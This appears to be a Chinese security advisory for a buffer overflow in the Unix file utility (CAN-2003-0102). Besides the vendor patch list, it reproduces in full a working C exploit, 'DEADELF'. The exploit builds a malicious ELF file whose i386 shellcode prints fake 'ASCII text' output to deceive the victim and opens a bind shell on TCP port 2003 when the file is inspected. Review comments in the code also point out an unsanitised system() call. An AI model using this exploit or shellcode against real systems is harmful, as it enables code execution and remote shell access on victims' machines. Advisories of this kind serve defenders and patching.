File工具本地缓冲区溢出漏洞
发布时间:2003-03-04 更新时间:2003-03-21 严重程度:高 威胁程度:本地拒绝服务 错误类型:边界检查错误 利用方式:客户机模式 BUGTRAQ ID:7009 CVE(CAN) ID:CAN-2003-0102
受影响系统: file 3.28(下文"解决方案"一节同时给出了 3.30 至 3.40 各版本的修补包;测试代码作者称 3.39 及更早版本均可被利用)
详细描述: file程序在处理特制的ELF文件时存在边界检查错误(缓冲区溢出)。本地攻击者可诱使用户对恶意文件运行file,造成拒绝服务,甚至以运行file程序的用户身份执行任意代码;若有服务会自动对不可信文件调用file,也应一并排查。目前尚无公开的技术细节。
测试代码: CrZ <crazy_einstein@yahoo.com> 和 LimpidByte <lbyte.void.ru> 提供了如下测试程序。注意:该程序仅针对 x86 Linux,默认返回地址 0xbfffbd40 取自作者的 RedHat 8.0(file 3.37/3.38)测试环境,在其他环境下通常需要通过第二个参数另行指定;生成的文件在被 file 解析时会在 TCP 2003 端口开启一个绑定 shell,请勿在生产系统上运行。
/* \ __________________ / Black Sand Project \ __________________ / \ Created by CrZ [crazy_einstein@yahoo.com] LimpidByte [lbyte.void.ru] /06.03.2003/ / \ Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt / \ program name: DEADELF / \ description: Exploit for file program <= 3.39 / \ info: program create file-exploit and when you / make "file /path/to/this/file-exploit" shell \ will open on 2003 port. / \ Usage: ./85deadelf <file-exploit> [return address] / \ Example of work: / \ [crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c / [crz@blacksand crz]$ ./85deadelf deadelf \ [+] Creating a evil file deadelf! / [+] Using address of shellcode = 0xbfffbd40 \ [crz@blacksand crz]$ file deadelf / File: ASCII text \ [crz@blacksand crz]$ telnet localhost 2003 / Trying 127.0.0.1... \ Connected to blacksand (127.0.0.1). / Escape character is '^]'. \ id; / uid=500(crz) gid=500(crz) groups=500(crz) \ : command not found / exit; \ Connection closed by foreign host. 
 * [crz@blacksand crz]$
 *
 * Tested against: file-3.37 (RedHat8.0)
 *                 file-3.38 (RedHat8.0)
 *
 * NOTE(review): exit()/system() need <stdlib.h>, write()/close() need
 * <unistd.h> and bzero() needs <strings.h>; none of them is included
 * below, so every one of those calls is an implicit declaration.
 */
#include <fcntl.h>
#include <elf.h>
#include <stdio.h>

/*
 * Print the author banner and the usage line, then exit(0).
 *
 * prog: argv[0], echoed into the usage text.
 * Never returns.
 */
void usage(char *prog) {
    printf("\nCreated by CrZ [crazy_einstein@yahoo.com] Limpid Byte [lbyte.void.ru]\n");
    printf("Usage: %s <name of evil file> [return address]\n\n",prog);
    exit(0);
}

/*
 * Write the crafted ELF file that triggers the file(1) bug.
 *
 * argv[1]: path of the file to create (required; usage() is shown and
 *          the program exits otherwise).
 * argv[2]: optional return address written as "0x..." hex; the default
 *          0xbfffbd40 is a stack address from the author's test box and
 *          is not expected to be right anywhere else.
 *
 * Output layout: a 32-bit little-endian ELF header whose program- and
 * section-header entry sizes are 0xfff, then 20 copies of the return
 * address, 6000 NOP bytes (0x90) and the shellcode.
 * Returns 0 unconditionally; I/O errors are neither checked nor reported.
 */
int main(int argc, char **argv) {
    /*
     * i386 Linux shellcode by CrZ. It first write()s a fake
     * "File: ASCII text" line to stdout so the victim sees what looks
     * like normal file(1) output, then binds a shell on TCP port 2003.
     */
    char shellcode[]=
        "\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text");*/
        "\x68\x01\x01\x0a\x0d\x68\x74\x65"
        "\x78\x74\x68\x43\x49\x49\x20\x68"
        "\x3a\x20\x41\x53\x68\x46\x69\x6c"
        "\x65\x89\xe1\xb2\x18\xb0\x04\xcd\x80"
        /* bind shell on port 2003 (0x07d3 is stored in network byte order below) */
        "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
        "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
        "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
        "\x07\xd3\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
        "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
        "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
        "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
    int fd,i;
    Elf32_Ehdr elfhdr;
    long xret=0xbfffbd40;       /* default return address (see banner: RedHat 8.0 test box) */
    char *evilfile="bl00mps";   /* placeholder name, always replaced by argv[1] */
    char tmp[100];              /* shell command buffer, see NOTE below */
    if(!argv[1]) usage(argv[0]);
    else evilfile=argv[1];
    /*
     * NOTE(review): "%x" stores an unsigned int but xret is a long, so the
     * conversion width does not match the object (only 4 of 8 bytes are
     * written on LP64). "%lx", or strtoul(argv[2], NULL, 16), would be right.
     */
    if(argv[2]) sscanf(argv[2],"0x%x",&xret);
    printf("[+] Creating a evil file %s!\n",evilfile);
    /* NOTE(review): same width mismatch, "%x" printing a long. */
    printf("[+] Using address of shellcode = 0x%x\n",xret);
    /*
     * NOTE(review): the file is created by running "echo>NAME" through
     * the shell. tmp is 100 bytes and argv[1] is copied into it by
     * sprintf() with no length check (stack overflow for a path longer
     * than ~94 bytes), and any shell metacharacters in argv[1] are
     * executed by system(). open(evilfile, O_WRONLY|O_CREAT|O_TRUNC, 0644)
     * would create the file with neither problem.
     */
    sprintf(tmp,"echo>%s",evilfile);
    system(tmp);
    /*
     * NOTE(review): return value unchecked. If open() fails fd is -1 and
     * every write() below fails silently, but the program still reports
     * success and returns 0.
     */
    fd=open(evilfile,O_WRONLY);
    bzero(&elfhdr,sizeof elfhdr );
    elfhdr.e_type=1; /* ET_REL; original comment: must be neither ET_CORE (4) nor ET_EXEC (2) */
    /*
     * e_ident = "\x7fELF", ELFCLASS32, ELFDATA2LSB, EV_CURRENT. sprintf()
     * also stores a trailing NUL; e_ident is EI_NIDENT (16) bytes, so the
     * 8 bytes fit. memcpy() would avoid the unsigned char* / char* mismatch.
     */
    sprintf(elfhdr.e_ident,"\x7f\x45\x4c\x46\x01\x01\x01"); //ELF32 FORMAT
    elfhdr.e_machine=1;  /* EM_M32 in <elf.h>; presumably the parser does not care which machine */
    elfhdr.e_version=1;  /* EV_CURRENT */
    elfhdr.e_entry=0;
    /*
     * Both header tables are declared at file offset 0, so the oversized
     * read below starts at the ELF header itself and runs into the
     * return-address / NOP / shellcode payload written after it.
     */
    elfhdr.e_phoff=0;
    elfhdr.e_shoff=0;
    elfhdr.e_flags=0;
    elfhdr.e_ehsize=0;   /* not the real sizeof(Elf32_Ehdr); the vulnerable parser evidently does not check it (unverified here) */
    elfhdr.e_phentsize=0xfff; /* original comment: the size file(1) passes to read(); far larger than sizeof(Elf32_Phdr) */
    elfhdr.e_phnum=1;         /* one entry, so the program-header loop stops after the single oversized read() */
    elfhdr.e_shentsize=0xfff; /* same trick for the section headers */
    elfhdr.e_shnum=1;
    elfhdr.e_shstrndx=0;
    /* NOTE(review): none of the write() return values are checked. */
    write(fd,&elfhdr,sizeof(elfhdr));
    for(i=0;i<20;i++) write(fd,&xret,4); /* 20 copies of the return address (low 4 bytes of xret) */
    for(i=0;i<6000;i++) write(fd,"\x90",1); /* NOP sled, one byte per write() */
    write(fd,&shellcode,sizeof shellcode); /* shellcode, including its terminating NUL (sizeof, not strlen) */
    close(fd);
    return 0;
}
解决方案 file file 3.28: Red Hat Upgrade file-3.39-8.6x.i386.rpm ftp://updates.redhat.com/6.2/en/os/i386/file-3.39-8.6x.i386.rpm Debian Upgrade file_3.28-1.potato.1_alpha.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_alpha.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_arm.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_arm.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_i386.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_i386.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_m68k.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_m68k.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_powerpc.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_powerpc.deb Debian 2.2 (potato) Debian Upgrade file_3.28-1.potato.1_sparc.deb http://security.debian.org/pool/updates/main/f/file/file_3.28-1.potato.1_sparc.deb Debian 2.2 (potato) file file 3.30: Red Hat Upgrade file-3.39-8.7x.i386.rpm ftp://updates.redhat.com/7.0/en/os/i386/file-3.39-8.7x.i386.rpm file file 3.32: MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Single Network Firewall 7.2 MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Linux-Mandrake 7.2 Trustix Upgrade file-3.41-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.2/RPMS/file-3.41-1tr.i586.rpm Trustix Upgrade file-3.41-1tr.i586.rpm 
ftp://ftp.trustix.net/pub/Trustix/updates/1.1/RPMS/file-3.41-1tr.i586.rpm S.u.S.E. Upgrade file-3.33-85.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.3/a1/file-3.33-85.i386.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.33-85.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/file-3.33-85.src.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.32-118.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.1/a1/file-3.32-118.i386.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-118.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/file-3.32-118.src.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-69.alpha.rpm ftp://ftp.suse.com/pub/suse/axp/update/7.1/a1/file-3.32-69.alpha.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-69.src.rpm ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/file-3.32-69.src.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-36.ppc.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.1/a1/file-3.32-36.ppc.rpm SuSE-7.1 S.u.S.E. Upgrade file-3.32-36.src.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/file-3.32-36.src.rpm SuSE-7.1 file file 3.33: Red Hat Upgrade file-3.39-8.7x.i386.rpm ftp://updates.redhat.com/7.1/en/os/i386/file-3.39-8.7x.i386.rpm S.u.S.E. Upgrade file-3.33-39.sparc.rpm ftp://ftp.suse.com/pub/suse/sparc/update/7.3/a1/file-3.33-39.sparc.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.33-39.src.rpm ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/file-3.33-39.src.rpm SuSE-7.3 S.u.S.E. Upgrade file-3.33-69.ppc.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.3/a1/file-3.33-69.ppc.rpm SuSE-7.3 S.u.S.E. 
Upgrade file-3.33-69.src.rpm ftp://ftp.suse.com/pub/suse/ppc/update/7.3/zq1/file-3.33-69.src.rpm SuSE-7.3 file file 3.34: MandrakeSoft Upgrade file-3.41-1.1mdk.ppc.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0/PPC MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.0 file file 3.35: Red Hat Upgrade file-3.39-8.7x.ia64.rpm ftp://updates.redhat.com/7.2/en/os/ia64/file-3.39-8.7x.ia64.rpm Red Hat Upgrade file-3.39-8.7x.i386.rpm ftp://updates.redhat.com/7.2/en/os/i386/file-3.39-8.7x.i386.rpm Trustix Upgrade file-3.41-1tr.i586.rpm ftp://ftp.trustix.net/pub/Trustix/updates/1.5/RPMS/file-3.41-1tr.i586.rpm file file 3.36: MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1 MandrakeSoft Upgrade file-3.41-1.1mdk.ia64.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.1/IA64 file file 3.37: file Upgrade file-3.41.tar.gz ftp://ftp.gw.com/mirrors/pub/unix/file/file-3.41.tar.gz MandrakeSoft Upgrade file-3.41-1.1mdk.ppc.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2/PPC MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 8.2 Red Hat Upgrade file-3.39-9.i386.rpm ftp://updates.redhat.com/8.0/en/os/i386/file-3.39-9.i386.rpm Red Hat Upgrade file-3.39-8.7x.i386.rpm ftp://updates.redhat.com/7.3/en/os/i386/file-3.39-8.7x.i386.rpm Debian Upgrade file_3.37-3.1.woody.1_alpha.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_alpha.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_arm.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_arm.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_hppa.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_hppa.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_i386.deb 
http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_i386.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_ia64.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_ia64.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_m68k.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_m68k.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_mips.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_mips.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_mipsel.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_mipsel.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_powerpc.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_powerpc.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_s390.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_s390.deb Debian 3.0 (woody) Debian Upgrade file_3.37-3.1.woody.1_sparc.deb http://security.debian.org/pool/updates/main/f/file/file_3.37-3.1.woody.1_sparc.deb Debian 3.0 (woody) S.u.S.E. Upgrade file-3.37-206.i586.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/file-3.37-206.i586.rpm SuSE-8.1 S.u.S.E. Upgrade file-3.37-206.i586.patch.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/file-3.37-206.i586.patch.rpm SuSE-8.1 S.u.S.E. Upgrade file-3.37-206.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/file-3.37-206.src.rpm SuSE-8.1 S.u.S.E. Upgrade file-3.37-206.i386.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.0/a1/file-3.37-206.i386.rpm SuSE-8.0 S.u.S.E. Upgrade file-3.37-206.i386.patch.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.0/a1/file-3.37-206.i386.patch.rpm SuSE-8.0 S.u.S.E. 
Upgrade file-3.37-206.src.rpm ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/file-3.37-206.src.rpm SuSE-8.0 file file 3.39: OpenPKG RPM file-3.39-1.1.2.src.rpm ftp://ftp.openpkg.org/release/1.1/UPD/file-3.39-1.1.2.src.rpm OpenPKG RPM file-3.39-1.2.1.src.rpm ftp://ftp.openpkg.org/release/1.2/UPD/file-3.39-1.2.1.src.rpm file Upgrade file-3.41.tar.gz ftp://ftp.gw.com/mirrors/pub/unix/file/file-3.41.tar.gz MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Mandrake Linux 9.0 MandrakeSoft Upgrade file-3.41-1.1mdk.i586.rpm http://www.mandrakesecure.net/en/ftp.php Corporate Server 2.1 file file 3.40: OpenPKG RPM file-3.41-20030228.src.rpm ftp://ftp.openpkg.org/current/SRC/file-3.41-20030228.src.rpm file Upgrade file-3.41.tar.gz ftp://ftp.gw.com/mirrors/pub/unix/file/file-3.41.tar.gz EnGarde Upgrade file-3.41-1.0.2.i386.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i386/file-3.41-1.0.2.i386.rpm EnGarde Upgrade file-3.41-1.0.2.src.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/SRPMS/file-3.41-1.0.2.src.rpm EnGarde Upgrade file-3.41-1.0.2.i686.rpm ftp://ftp.engardelinux.org/pub/engarde/stable/updates/i686/file-3.41-1.0.2.i686.rpm 相关信息 报告:Jeff Johnson 相关信息:http://online.securityfocus.com/advisories/5078 http://online.securityfocus.com/advisories/5088 http://online.securityfocus.com/advisories/5074 http://online.securityfocus.com/advisories/50 |